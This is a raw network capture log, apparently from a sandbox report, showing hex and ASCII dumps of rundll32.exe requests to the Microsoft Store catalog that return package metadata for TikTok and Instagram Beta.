                                                                                                                                                                                    2023-01-05 07:59:11 UTC15305INData Raw: 7e 5f 36 79 63 63 6e 64 6e 36 30 36 34 73 65 5c 22 2c 5c 22 63 6f 6e 74 65 6e 74 2e 70 72 6f 64 75 63 74 49 64 5c 22 3a 5c 22 30 30 30 31 37 34 62 65 2d 31 31 63 36 2d 34 35 37 61 2d 38 39 39 35 2d 66 36 37 66 63 32 61 35 33 32 36 39 5c 22 2c 5c 22 63 6f 6e 74 65 6e 74 2e 74 61 72 67 65 74 50 6c 61 74 66 6f 72 6d 73 5c 22 3a 5b 7b 5c 22 70 6c 61 74 66 6f 72 6d 2e 6d 61 78 56 65 72 73 69 6f 6e 54 65 73 74 65 64 5c 22 3a 33 33 37 37 36 39 39 37 32 30 35 32 37 38 37 32 2c 5c 22 70 6c 61 74 66 6f 72 6d 2e 6d 69 6e 56 65 72 73 69 6f 6e 5c 22 3a 32 38 31 34 37 35 31 30 31 32 34 38 37 31 36 38 2c 5c 22 70 6c 61 74 66 6f 72 6d 2e 74 61 72 67 65 74 5c 22 3a 35 7d 5d 2c 5c 22 63 6f 6e 74 65 6e 74 2e 74 79 70 65 5c 22 3a 37 2c 5c 22 70 6f 6c 69 63 79 5c 22 3a 7b 5c
                                                                                                                                                                                    Data Ascii: ~_6yccndn6064se\",\"content.productId\":\"000174be-11c6-457a-8995-f67fc2a53269\",\"content.targetPlatforms\":[{\"platform.maxVersionTested\":3377699720527872,\"platform.minVersion\":2814751012487168,\"platform.target\":5}],\"content.type\":7,\"policy\":{\
                                                                                                                                                                                    2023-01-05 07:59:11 UTC15306INData Raw: 72 65 73 22 3a 5b 22 6e 65 75 74 72 61 6c 22 5d 2c 22 43 61 70 61 62 69 6c 69 74 69 65 73 22 3a 5b 22 72 75 6e 46 75 6c 6c 54 72 75 73 74 22 5d 2c 22 45 78 70 65 72 69 65 6e 63 65 49 64 73 22 3a 5b 5d 2c 22 4d 61 78 44 6f 77 6e 6c 6f 61 64 53 69 7a 65 49 6e 42 79 74 65 73 22 3a 37 33 32 36 33 32 2c 22 4d 61 78 49 6e 73 74 61 6c 6c 53 69 7a 65 49 6e 42 79 74 65 73 22 3a 38 39 32 39 32 38 2c 22 50 61 63 6b 61 67 65 46 6f 72 6d 61 74 22 3a 22 4d 73 69 78 42 75 6e 64 6c 65 22 2c 22 50 61 63 6b 61 67 65 46 61 6d 69 6c 79 4e 61 6d 65 22 3a 22 42 79 74 65 64 61 6e 63 65 50 74 65 2e 4c 74 64 2e 54 69 6b 54 6f 6b 5f 36 79 63 63 6e 64 6e 36 30 36 34 73 65 22 2c 22 4d 61 69 6e 50 61 63 6b 61 67 65 46 61 6d 69 6c 79 4e 61 6d 65 46 6f 72 44 6c 63 22 3a 6e 75 6c 6c 2c
                                                                                                                                                                                    Data Ascii: res":["neutral"],"Capabilities":["runFullTrust"],"ExperienceIds":[],"MaxDownloadSizeInBytes":732632,"MaxInstallSizeInBytes":892928,"PackageFormat":"MsixBundle","PackageFamilyName":"BytedancePte.Ltd.TikTok_6yccndn6064se","MainPackageFamilyNameForDlc":null,
                                                                                                                                                                                    2023-01-05 07:59:11 UTC15307INData Raw: 33 36 2c 5c 22 70 6c 61 74 66 6f 72 6d 2e 6d 69 6e 56 65 72 73 69 6f 6e 5c 22 3a 32 38 31 34 37 35 31 30 31 34 39 37 37 35 33 36 2c 5c 22 70 6c 61 74 66 6f 72 6d 2e 74 61 72 67 65 74 5c 22 3a 33 7d 2c 7b 5c 22 70 6c 61 74 66 6f 72 6d 2e 6d 61 78 56 65 72 73 69 6f 6e 54 65 73 74 65 64 5c 22 3a 32 38 31 34 37 35 31 30 31 34 39 37 37 35 33 36 2c 5c 22 70 6c 61 74 66 6f 72 6d 2e 6d 69 6e 56 65 72 73 69 6f 6e 5c 22 3a 32 38 31 34 37 35 31 30 31 34 39 37 37 35 33 36 2c 5c 22 70 6c 61 74 66 6f 72 6d 2e 74 61 72 67 65 74 5c 22 3a 31 30 7d 5d 2c 5c 22 63 6f 6e 74 65 6e 74 2e 74 79 70 65 5c 22 3a 37 2c 5c 22 70 6f 6c 69 63 79 5c 22 3a 7b 5c 22 63 61 74 65 67 6f 72 79 2e 66 69 72 73 74 5c 22 3a 5c 22 61 70 70 5c 22 2c 5c 22 63 61 74 65 67 6f 72 79 2e 73 65 63 6f 6e
                                                                                                                                                                                    Data Ascii: 36,\"platform.minVersion\":2814751014977536,\"platform.target\":3},{\"platform.maxVersionTested\":2814751014977536,\"platform.minVersion\":2814751014977536,\"platform.target\":10}],\"content.type\":7,\"policy\":{\"category.first\":\"app\",\"category.secon
                                                                                                                                                                                    2023-01-05 07:59:11 UTC15308INData Raw: 6e 74 22 2c 22 72 75 6e 46 75 6c 6c 54 72 75 73 74 22 2c 22 4d 69 63 72 6f 73 6f 66 74 2e 73 74 6f 72 65 46 69 6c 74 65 72 2e 63 6f 72 65 2e 6e 6f 74 53 75 70 70 6f 72 74 65 64 5f 38 77 65 6b 79 62 33 64 38 62 62 77 65 22 5d 2c 22 45 78 70 65 72 69 65 6e 63 65 49 64 73 22 3a 5b 5d 2c 22 4d 61 78 44 6f 77 6e 6c 6f 61 64 53 69 7a 65 49 6e 42 79 74 65 73 22 3a 37 38 35 38 37 39 2c 22 4d 61 78 49 6e 73 74 61 6c 6c 53 69 7a 65 49 6e 42 79 74 65 73 22 3a 31 30 39 33 36 33 32 2c 22 50 61 63 6b 61 67 65 46 6f 72 6d 61 74 22 3a 22 41 70 70 78 42 75 6e 64 6c 65 22 2c 22 50 61 63 6b 61 67 65 46 61 6d 69 6c 79 4e 61 6d 65 22 3a 22 42 79 74 65 64 61 6e 63 65 50 74 65 2e 4c 74 64 2e 54 69 6b 54 6f 6b 5f 36 79 63 63 6e 64 6e 36 30 36 34 73 65 22 2c 22 4d 61 69 6e 50 61
                                                                                                                                                                                    Data Ascii: nt","runFullTrust","Microsoft.storeFilter.core.notSupported_8wekyb3d8bbwe"],"ExperienceIds":[],"MaxDownloadSizeInBytes":785879,"MaxInstallSizeInBytes":1093632,"PackageFormat":"AppxBundle","PackageFamilyName":"BytedancePte.Ltd.TikTok_6yccndn6064se","MainPa
                                                                                                                                                                                    2023-01-05 07:59:11 UTC15309INData Raw: 74 79 70 65 5c 22 3a 37 2c 5c 22 70 6f 6c 69 63 79 5c 22 3a 7b 5c 22 63 61 74 65 67 6f 72 79 2e 66 69 72 73 74 5c 22 3a 5c 22 61 70 70 5c 22 2c 5c 22 63 61 74 65 67 6f 72 79 2e 73 65 63 6f 6e 64 5c 22 3a 5c 22 45 6e 74 65 72 74 61 69 6e 6d 65 6e 74 5c 22 2c 5c 22 6f 70 74 4f 75 74 2e 62 61 63 6b 75 70 52 65 73 74 6f 72 65 5c 22 3a 66 61 6c 73 65 2c 5c 22 6f 70 74 4f 75 74 2e 72 65 6d 6f 76 65 61 62 6c 65 4d 65 64 69 61 5c 22 3a 66 61 6c 73 65 7d 2c 5c 22 70 6f 6c 69 63 79 32 5c 22 3a 7b 5c 22 61 67 65 52 61 74 69 6e 67 5c 22 3a 33 2c 5c 22 6f 70 74 4f 75 74 2e 44 56 52 5c 22 3a 66 61 6c 73 65 2c 5c 22 74 68 69 72 64 50 61 72 74 79 41 70 70 52 61 74 69 6e 67 73 5c 22 3a 5b 7b 5c 22 6c 65 76 65 6c 5c 22 3a 39 2c 5c 22 73 79 73 74 65 6d 49 64 5c 22 3a 33 7d
                                                                                                                                                                                    Data Ascii: type\":7,\"policy\":{\"category.first\":\"app\",\"category.second\":\"Entertainment\",\"optOut.backupRestore\":false,\"optOut.removeableMedia\":false},\"policy2\":{\"ageRating\":3,\"optOut.DVR\":false,\"thirdPartyAppRatings\":[{\"level\":9,\"systemId\":3}
                                                                                                                                                                                    2023-01-05 07:59:11 UTC15310INData Raw: 70 70 3b 33 22 2c 22 41 76 61 69 6c 61 62 69 6c 69 74 79 49 64 22 3a 22 39 5a 58 47 30 48 4c 52 4e 4e 31 57 22 2c 22 43 6f 6e 64 69 74 69 6f 6e 73 22 3a 7b 22 43 6c 69 65 6e 74 43 6f 6e 64 69 74 69 6f 6e 73 22 3a 7b 22 41 6c 6c 6f 77 65 64 50 6c 61 74 66 6f 72 6d 73 22 3a 5b 7b 22 4d 61 78 56 65 72 73 69 6f 6e 22 3a 32 31 34 37 34 38 33 36 34 37 2c 22 4d 69 6e 56 65 72 73 69 6f 6e 22 3a 30 2c 22 50 6c 61 74 66 6f 72 6d 4e 61 6d 65 22 3a 22 57 69 6e 64 6f 77 73 2e 44 65 73 6b 74 6f 70 22 7d 2c 7b 22 4d 61 78 56 65 72 73 69 6f 6e 22 3a 32 31 34 37 34 38 33 36 34 37 2c 22 4d 69 6e 56 65 72 73 69 6f 6e 22 3a 30 2c 22 50 6c 61 74 66 6f 72 6d 4e 61 6d 65 22 3a 22 57 69 6e 64 6f 77 73 2e 4d 6f 62 69 6c 65 22 7d 2c 7b 22 4d 61 78 56 65 72 73 69 6f 6e 22 3a 32 31
                                                                                                                                                                                    Data Ascii: pp;3","AvailabilityId":"9ZXG0HLRNN1W","Conditions":{"ClientConditions":{"AllowedPlatforms":[{"MaxVersion":2147483647,"MinVersion":0,"PlatformName":"Windows.Desktop"},{"MaxVersion":2147483647,"MinVersion":0,"PlatformName":"Windows.Mobile"},{"MaxVersion":21
                                                                                                                                                                                    2023-01-05 07:59:11 UTC15311INData Raw: 79 3b 33 22 2c 22 41 76 61 69 6c 61 62 69 6c 69 74 79 42 53 63 68 65 6d 61 22 3a 22 41 76 61 69 6c 61 62 69 6c 69 74 79 55 6e 69 66 69 65 64 41 70 70 3b 33 22 2c 22 41 76 61 69 6c 61 62 69 6c 69 74 79 49 64 22 3a 22 39 5a 35 54 46 44 38 51 56 44 53 4c 22 2c 22 43 6f 6e 64 69 74 69 6f 6e 73 22 3a 7b 22 43 6c 69 65 6e 74 43 6f 6e 64 69 74 69 6f 6e 73 22 3a 7b 22 41 6c 6c 6f 77 65 64 50 6c 61 74 66 6f 72 6d 73 22 3a 5b 7b 22 4d 61 78 56 65 72 73 69 6f 6e 22 3a 32 31 34 37 34 38 33 36 34 37 2c 22 4d 69 6e 56 65 72 73 69 6f 6e 22 3a 30 2c 22 50 6c 61 74 66 6f 72 6d 4e 61 6d 65 22 3a 22 57 69 6e 64 6f 77 73 2e 44 65 73 6b 74 6f 70 22 7d 2c 7b 22 4d 61 78 56 65 72 73 69 6f 6e 22 3a 32 31 34 37 34 38 33 36 34 37 2c 22 4d 69 6e 56 65 72 73 69 6f 6e 22 3a 30 2c 22
                                                                                                                                                                                    Data Ascii: y;3","AvailabilityBSchema":"AvailabilityUnifiedApp;3","AvailabilityId":"9Z5TFD8QVDSL","Conditions":{"ClientConditions":{"AllowedPlatforms":[{"MaxVersion":2147483647,"MinVersion":0,"PlatformName":"Windows.Desktop"},{"MaxVersion":2147483647,"MinVersion":0,"
                                                                                                                                                                                    2023-01-05 07:59:11 UTC15312INData Raw: 65 22 2c 22 44 65 74 61 69 6c 73 22 5d 2c 22 41 76 61 69 6c 61 62 69 6c 69 74 79 41 53 63 68 65 6d 61 22 3a 22 41 76 61 69 6c 61 62 69 6c 69 74 79 3b 33 22 2c 22 41 76 61 69 6c 61 62 69 6c 69 74 79 42 53 63 68 65 6d 61 22 3a 22 41 76 61 69 6c 61 62 69 6c 69 74 79 55 6e 69 66 69 65 64 41 70 70 3b 33 22 2c 22 41 76 61 69 6c 61 62 69 6c 69 74 79 49 64 22 3a 22 42 34 32 57 58 39 50 48 47 46 4d 30 22 2c 22 43 6f 6e 64 69 74 69 6f 6e 73 22 3a 7b 22 43 6c 69 65 6e 74 43 6f 6e 64 69 74 69 6f 6e 73 22 3a 7b 22 41 6c 6c 6f 77 65 64 50 6c 61 74 66 6f 72 6d 73 22 3a 5b 7b 22 4d 61 78 56 65 72 73 69 6f 6e 22 3a 32 31 34 37 34 38 33 36 34 37 2c 22 4d 69 6e 56 65 72 73 69 6f 6e 22 3a 30 2c 22 50 6c 61 74 66 6f 72 6d 4e 61 6d 65 22 3a 22 57 69 6e 64 6f 77 73 2e 58 62 6f
                                                                                                                                                                                    Data Ascii: e","Details"],"AvailabilityASchema":"Availability;3","AvailabilityBSchema":"AvailabilityUnifiedApp;3","AvailabilityId":"B42WX9PHGFM0","Conditions":{"ClientConditions":{"AllowedPlatforms":[{"MaxVersion":2147483647,"MinVersion":0,"PlatformName":"Windows.Xbo


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                    54192.168.2.44990220.82.154.241443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                    2023-01-05 07:59:12 UTC15312OUTGET /v7.0/products/lookup?alternateId=PackageFamilyName&value=Facebook.InstagramBeta_8xx8rvfyw5nnt&market=US&languages=en-US%2Cen%2Cneutral&fieldsTemplate=InstallAgent&moId=Public&oemId=Public&scmId=Public HTTP/1.1
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                    User-Agent: Install Service
                                                                                                                                                                                    MS-CV: GVINRJ5SwUqgi3dw.0.2.4
                                                                                                                                                                                    Host: displaycatalog.mp.microsoft.com
                                                                                                                                                                                    2023-01-05 07:59:12 UTC15313INHTTP/1.1 200 OK
                                                                                                                                                                                    Content-Length: 24346
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    Content-Type: application/json; charset=utf-8
                                                                                                                                                                                    Date: Thu, 05 Jan 2023 07:59:12 GMT
                                                                                                                                                                                    Server: Kestrel
                                                                                                                                                                                    Vary: Authorization
                                                                                                                                                                                    MS-CorrelationId: 92f10484-7d8e-45bc-aae2-03972dc85f58
                                                                                                                                                                                    MS-RequestId: 08963d98-568c-45fc-9d48-d49a61c391f4
                                                                                                                                                                                    MS-CV: GVINRJ5SwUqgi3dw.0.2.4.4008885231.1122010050.0
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    MS-ServerId: b4ddc6-bxzvh
                                                                                                                                                                                    MS-DocumentVersions: 9NBLGGH5L9XT|4273
                                                                                                                                                                                    2023-01-05 07:59:12 UTC15313INData Raw: 7b 22 42 69 67 49 64 73 22 3a 5b 22 39 4e 42 4c 47 47 48 35 4c 39 58 54 22 5d 2c 22 48 61 73 4d 6f 72 65 50 61 67 65 73 22 3a 66 61 6c 73 65 2c 22 50 72 6f 64 75 63 74 73 22 3a 5b 7b 22 4c 61 73 74 4d 6f 64 69 66 69 65 64 44 61 74 65 22 3a 22 32 30 32 32 2d 30 33 2d 30 38 54 31 39 3a 35 35 3a 34 31 2e 35 31 32 36 37 32 39 5a 22 2c 22 4c 6f 63 61 6c 69 7a 65 64 50 72 6f 70 65 72 74 69 65 73 22 3a 5b 7b 22 46 72 61 6e 63 68 69 73 65 73 22 3a 5b 5d 2c 22 49 6d 61 67 65 73 22 3a 5b 7b 22 46 69 6c 65 49 64 22 3a 22 33 30 30 34 39 32 34 35 34 39 31 34 39 38 32 32 39 34 39 22 2c 22 45 49 53 4c 69 73 74 69 6e 67 49 64 65 6e 74 69 66 69 65 72 22 3a 6e 75 6c 6c 2c 22 42 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 22 3a 22 22 2c 22 43 61 70 74 69 6f 6e 22 3a 22 22 2c
                                                                                                                                                                                    Data Ascii: {"BigIds":["9NBLGGH5L9XT"],"HasMorePages":false,"Products":[{"LastModifiedDate":"2022-03-08T19:55:41.5126729Z","LocalizedProperties":[{"Franchises":[],"Images":[{"FileId":"3004924549149822949","EISListingIdentifier":null,"BackgroundColor":"","Caption":"",
                                                                                                                                                                                    2023-01-05 07:59:12 UTC15314INData Raw: 64 33 22 2c 22 57 69 64 74 68 22 3a 32 37 33 32 7d 2c 7b 22 46 69 6c 65 49 64 22 3a 22 33 30 35 32 35 32 31 39 35 37 32 32 33 36 35 31 33 30 30 22 2c 22 45 49 53 4c 69 73 74 69 6e 67 49 64 65 6e 74 69 66 69 65 72 22 3a 6e 75 6c 6c 2c 22 42 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 22 3a 22 22 2c 22 43 61 70 74 69 6f 6e 22 3a 22 22 2c 22 46 69 6c 65 53 69 7a 65 49 6e 42 79 74 65 73 22 3a 32 34 38 38 30 38 38 2c 22 46 6f 72 65 67 72 6f 75 6e 64 43 6f 6c 6f 72 22 3a 22 22 2c 22 48 65 69 67 68 74 22 3a 31 35 33 36 2c 22 49 6d 61 67 65 50 6f 73 69 74 69 6f 6e 49 6e 66 6f 22 3a 22 44 65 73 6b 74 6f 70 2f 31 22 2c 22 49 6d 61 67 65 50 75 72 70 6f 73 65 22 3a 22 53 63 72 65 65 6e 73 68 6f 74 22 2c 22 55 6e 73 63 61 6c 65 64 49 6d 61 67 65 53 48 41 32 35 36 48 61
                                                                                                                                                                                    Data Ascii: d3","Width":2732},{"FileId":"3052521957223651300","EISListingIdentifier":null,"BackgroundColor":"","Caption":"","FileSizeInBytes":2488088,"ForegroundColor":"","Height":1536,"ImagePositionInfo":"Desktop/1","ImagePurpose":"Screenshot","UnscaledImageSHA256Ha
                                                                                                                                                                                    2023-01-05 07:59:12 UTC15315INData Raw: 6d 20 4d 65 74 61 2e 5c 6e 5c 6e 43 6f 6e 6e 65 63 74 20 77 69 74 68 20 66 72 69 65 6e 64 73 2c 20 73 68 61 72 65 20 77 68 61 74 20 79 6f 75 27 72 65 20 75 70 20 74 6f 20 6f 72 20 73 65 65 20 77 68 61 74 27 73 20 6e 65 77 20 66 72 6f 6d 20 6f 74 68 65 72 73 20 61 6c 6c 20 6f 76 65 72 20 74 68 65 20 77 6f 72 6c 64 2e 20 45 78 70 6c 6f 72 65 20 6f 75 72 20 63 6f 6d 6d 75 6e 69 74 79 20 77 68 65 72 65 20 79 6f 75 20 63 61 6e 20 66 65 65 6c 20 66 72 65 65 20 74 6f 20 62 65 20 79 6f 75 72 73 65 6c 66 20 61 6e 64 20 73 68 61 72 65 20 65 76 65 72 79 74 68 69 6e 67 20 66 72 6f 6d 20 79 6f 75 72 20 64 61 69 6c 79 20 6d 6f 6d 65 6e 74 73 20 74 6f 20 6c 69 66 65 27 73 20 68 69 67 68 6c 69 67 68 74 73 2e 5c 6e 5c 6e 45 78 70 72 65 73 73 20 79 6f 75 72 73 65 6c 66 20
                                                                                                                                                                                    Data Ascii: m Meta.\n\nConnect with friends, share what you're up to or see what's new from others all over the world. Explore our community where you can feel free to be yourself and share everything from your daily moments to life's highlights.\n\nExpress yourself
                                                                                                                                                                                    2023-01-05 07:59:12 UTC15316INData Raw: 22 2c 22 4d 59 22 2c 22 4d 54 22 2c 22 4d 52 22 2c 22 4d 58 22 2c 22 4d 41 22 2c 22 4e 4c 22 2c 22 4e 5a 22 2c 22 4e 47 22 2c 22 4e 4f 22 2c 22 4f 4d 22 2c 22 50 4b 22 2c 22 50 45 22 2c 22 50 48 22 2c 22 50 4c 22 2c 22 50 54 22 2c 22 51 41 22 2c 22 52 4f 22 2c 22 52 55 22 2c 22 53 41 22 2c 22 52 53 22 2c 22 53 47 22 2c 22 53 4b 22 2c 22 53 49 22 2c 22 5a 41 22 2c 22 4b 52 22 2c 22 45 53 22 2c 22 53 45 22 2c 22 43 48 22 2c 22 54 57 22 2c 22 54 48 22 2c 22 54 54 22 2c 22 54 4e 22 2c 22 54 52 22 2c 22 55 41 22 2c 22 41 45 22 2c 22 47 42 22 2c 22 56 4e 22 2c 22 59 45 22 2c 22 4c 59 22 2c 22 4c 4b 22 2c 22 55 59 22 2c 22 56 45 22 2c 22 41 46 22 2c 22 41 58 22 2c 22 41 4c 22 2c 22 41 53 22 2c 22 41 4f 22 2c 22 41 49 22 2c 22 41 51 22 2c 22 41 47 22 2c 22 41 4d
                                                                                                                                                                                    Data Ascii: ","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM
                                                                                                                                                                                    2023-01-05 07:59:12 UTC15317INData Raw: 6c 61 74 65 64 50 72 6f 64 75 63 74 73 22 3a 5b 5d 2c 22 4d 61 72 6b 65 74 73 22 3a 5b 22 55 53 22 5d 7d 5d 2c 22 50 72 6f 64 75 63 74 41 53 63 68 65 6d 61 22 3a 22 50 72 6f 64 75 63 74 3b 33 22 2c 22 50 72 6f 64 75 63 74 42 53 63 68 65 6d 61 22 3a 22 50 72 6f 64 75 63 74 55 6e 69 66 69 65 64 41 70 70 3b 33 22 2c 22 50 72 6f 64 75 63 74 49 64 22 3a 22 39 4e 42 4c 47 47 48 35 4c 39 58 54 22 2c 22 50 72 6f 70 65 72 74 69 65 73 22 3a 7b 22 50 61 63 6b 61 67 65 46 61 6d 69 6c 79 4e 61 6d 65 22 3a 22 46 61 63 65 62 6f 6f 6b 2e 49 6e 73 74 61 67 72 61 6d 42 65 74 61 5f 38 78 78 38 72 76 66 79 77 35 6e 6e 74 22 2c 22 50 61 63 6b 61 67 65 49 64 65 6e 74 69 74 79 4e 61 6d 65 22 3a 22 46 61 63 65 62 6f 6f 6b 2e 49 6e 73 74 61 67 72 61 6d 42 65 74 61 22 2c 22 50 75
                                                                                                                                                                                    Data Ascii: latedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NBLGGH5L9XT","Properties":{"PackageFamilyName":"Facebook.InstagramBeta_8xx8rvfyw5nnt","PackageIdentityName":"Facebook.InstagramBeta","Pu
                                                                                                                                                                                    2023-01-05 07:59:12 UTC15318INData Raw: 61 74 69 6f 6e 22 2c 22 44 69 73 70 6c 61 79 53 6b 75 41 76 61 69 6c 61 62 69 6c 69 74 69 65 73 22 3a 5b 7b 22 53 6b 75 22 3a 7b 22 4c 61 73 74 4d 6f 64 69 66 69 65 64 44 61 74 65 22 3a 22 32 30 32 32 2d 30 33 2d 30 38 54 31 39 3a 35 35 3a 34 31 2e 35 31 32 36 37 32 39 5a 22 2c 22 4c 6f 63 61 6c 69 7a 65 64 50 72 6f 70 65 72 74 69 65 73 22 3a 5b 7b 22 53 6b 75 44 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 42 72 69 6e 67 69 6e 67 20 79 6f 75 20 63 6c 6f 73 65 72 20 74 6f 20 74 68 65 20 70 65 6f 70 6c 65 20 61 6e 64 20 74 68 69 6e 67 73 20 79 6f 75 20 6c 6f 76 65 2e 20 e2 80 93 20 49 6e 73 74 61 67 72 61 6d 20 66 72 6f 6d 20 4d 65 74 61 2e 5c 6e 5c 6e 43 6f 6e 6e 65 63 74 20 77 69 74 68 20 66 72 69 65 6e 64 73 2c 20 73 68 61 72 65 20 77 68 61 74 20 79 6f 75 27
                                                                                                                                                                                    Data Ascii: ation","DisplaySkuAvailabilities":[{"Sku":{"LastModifiedDate":"2022-03-08T19:55:41.5126729Z","LocalizedProperties":[{"SkuDescription":"Bringing you closer to the people and things you love. Instagram from Meta.\n\nConnect with friends, share what you'
                                                                                                                                                                                    2023-01-05 07:59:12 UTC15319INData Raw: 22 2c 22 42 52 22 2c 22 42 47 22 2c 22 43 41 22 2c 22 43 4c 22 2c 22 43 4e 22 2c 22 43 4f 22 2c 22 43 52 22 2c 22 48 52 22 2c 22 43 59 22 2c 22 43 5a 22 2c 22 44 4b 22 2c 22 45 47 22 2c 22 45 45 22 2c 22 46 49 22 2c 22 46 52 22 2c 22 44 45 22 2c 22 47 52 22 2c 22 47 54 22 2c 22 48 4b 22 2c 22 48 55 22 2c 22 49 53 22 2c 22 49 4e 22 2c 22 49 44 22 2c 22 49 51 22 2c 22 49 45 22 2c 22 49 4c 22 2c 22 49 54 22 2c 22 4a 50 22 2c 22 4a 4f 22 2c 22 4b 5a 22 2c 22 4b 45 22 2c 22 4b 57 22 2c 22 4c 56 22 2c 22 4c 42 22 2c 22 4c 49 22 2c 22 4c 54 22 2c 22 4c 55 22 2c 22 4d 59 22 2c 22 4d 54 22 2c 22 4d 52 22 2c 22 4d 58 22 2c 22 4d 41 22 2c 22 4e 4c 22 2c 22 4e 5a 22 2c 22 4e 47 22 2c 22 4e 4f 22 2c 22 4f 4d 22 2c 22 50 4b 22 2c 22 50 45 22 2c 22 50 48 22 2c 22 50 4c
                                                                                                                                                                                    Data Ascii: ","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL
                                                                                                                                                                                    2023-01-05 07:59:12 UTC15320INData Raw: 48 22 2c 22 4b 4e 22 2c 22 4c 43 22 2c 22 50 4d 22 2c 22 56 43 22 2c 22 54 4a 22 2c 22 54 5a 22 2c 22 54 47 22 2c 22 54 4b 22 2c 22 54 4f 22 2c 22 54 4d 22 2c 22 54 43 22 2c 22 54 56 22 2c 22 55 4d 22 2c 22 55 47 22 2c 22 56 49 22 2c 22 56 47 22 2c 22 57 46 22 2c 22 45 48 22 2c 22 5a 4d 22 2c 22 5a 57 22 2c 22 55 5a 22 2c 22 56 55 22 2c 22 53 52 22 2c 22 53 5a 22 2c 22 41 44 22 2c 22 4d 43 22 2c 22 53 4d 22 2c 22 4d 45 22 2c 22 56 41 22 2c 22 4e 45 55 54 52 41 4c 22 5d 7d 5d 2c 22 50 72 6f 64 75 63 74 49 64 22 3a 22 39 4e 42 4c 47 47 48 35 4c 39 58 54 22 2c 22 50 72 6f 70 65 72 74 69 65 73 22 3a 7b 22 46 75 6c 66 69 6c 6c 6d 65 6e 74 44 61 74 61 22 3a 7b 22 50 72 6f 64 75 63 74 49 64 22 3a 22 39 4e 42 4c 47 47 48 35 4c 39 58 54 22 2c 22 57 75 43 61 74 65
                                                                                                                                                                                    Data Ascii: H","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"ProductId":"9NBLGGH5L9XT","Properties":{"FulfillmentData":{"ProductId":"9NBLGGH5L9XT","WuCate
                                                                                                                                                                                    2023-01-05 07:59:12 UTC15321INData Raw: 39 37 30 34 37 38 35 39 32 2c 22 4d 69 6e 56 65 72 73 69 6f 6e 22 3a 32 38 31 34 37 35 30 38 33 35 32 37 37 38 32 34 2c 22 50 6c 61 74 66 6f 72 6d 4e 61 6d 65 22 3a 22 57 69 6e 64 6f 77 73 2e 44 65 73 6b 74 6f 70 22 7d 5d 2c 22 50 6c 61 74 66 6f 72 6d 44 65 70 65 6e 64 65 6e 63 79 58 6d 6c 42 6c 6f 62 22 3a 22 7b 5c 22 62 6c 6f 62 2e 76 65 72 73 69 6f 6e 5c 22 3a 31 36 38 38 38 36 37 30 34 30 35 32 36 33 33 36 2c 5c 22 63 6f 6e 74 65 6e 74 2e 62 75 6e 64 6c 65 64 50 61 63 6b 61 67 65 73 5c 22 3a 5b 5c 22 46 61 63 65 62 6f 6f 6b 2e 49 6e 73 74 61 67 72 61 6d 42 65 74 61 5f 34 32 2e 30 2e 31 38 2e 30 5f 78 38 36 5f 5f 38 78 78 38 72 76 66 79 77 35 6e 6e 74 5c 22 5d 2c 5c 22 63 6f 6e 74 65 6e 74 2e 69 73 4d 61 69 6e 5c 22 3a 66 61 6c 73 65 2c 5c 22 63 6f 6e
                                                                                                                                                                                    Data Ascii: 970478592,"MinVersion":2814750835277824,"PlatformName":"Windows.Desktop"}],"PlatformDependencyXmlBlob":"{\"blob.version\":1688867040526336,\"content.bundledPackages\":[\"Facebook.InstagramBeta_42.0.18.0_x86__8xx8rvfyw5nnt\"],\"content.isMain\":false,\"con
                                                                                                                                                                                    2023-01-05 07:59:12 UTC15322INData Raw: 61 74 61 22 3a 7b 22 50 72 6f 64 75 63 74 49 64 22 3a 22 39 4e 42 4c 47 47 48 35 4c 39 58 54 22 2c 22 57 75 42 75 6e 64 6c 65 49 64 22 3a 22 65 66 34 30 37 36 39 31 2d 31 34 30 63 2d 34 35 62 32 2d 39 64 38 64 2d 62 65 38 38 34 32 38 63 62 31 64 34 22 2c 22 57 75 43 61 74 65 67 6f 72 79 49 64 22 3a 22 38 36 32 37 37 64 30 66 2d 38 35 34 37 2d 34 39 66 30 2d 62 39 64 32 2d 38 36 65 30 32 35 31 38 62 31 30 38 22 2c 22 50 61 63 6b 61 67 65 46 61 6d 69 6c 79 4e 61 6d 65 22 3a 22 46 61 63 65 62 6f 6f 6b 2e 49 6e 73 74 61 67 72 61 6d 42 65 74 61 5f 38 78 78 38 72 76 66 79 77 35 6e 6e 74 22 2c 22 53 6b 75 49 64 22 3a 22 30 30 31 30 22 2c 22 43 6f 6e 74 65 6e 74 22 3a 6e 75 6c 6c 2c 22 50 61 63 6b 61 67 65 46 65 61 74 75 72 65 73 22 3a 6e 75 6c 6c 7d 7d 2c 7b 22
                                                                                                                                                                                    Data Ascii: ata":{"ProductId":"9NBLGGH5L9XT","WuBundleId":"ef407691-140c-45b2-9d8d-be88428cb1d4","WuCategoryId":"86277d0f-8547-49f0-b9d2-86e02518b108","PackageFamilyName":"Facebook.InstagramBeta_8xx8rvfyw5nnt","SkuId":"0010","Content":null,"PackageFeatures":null}},{"
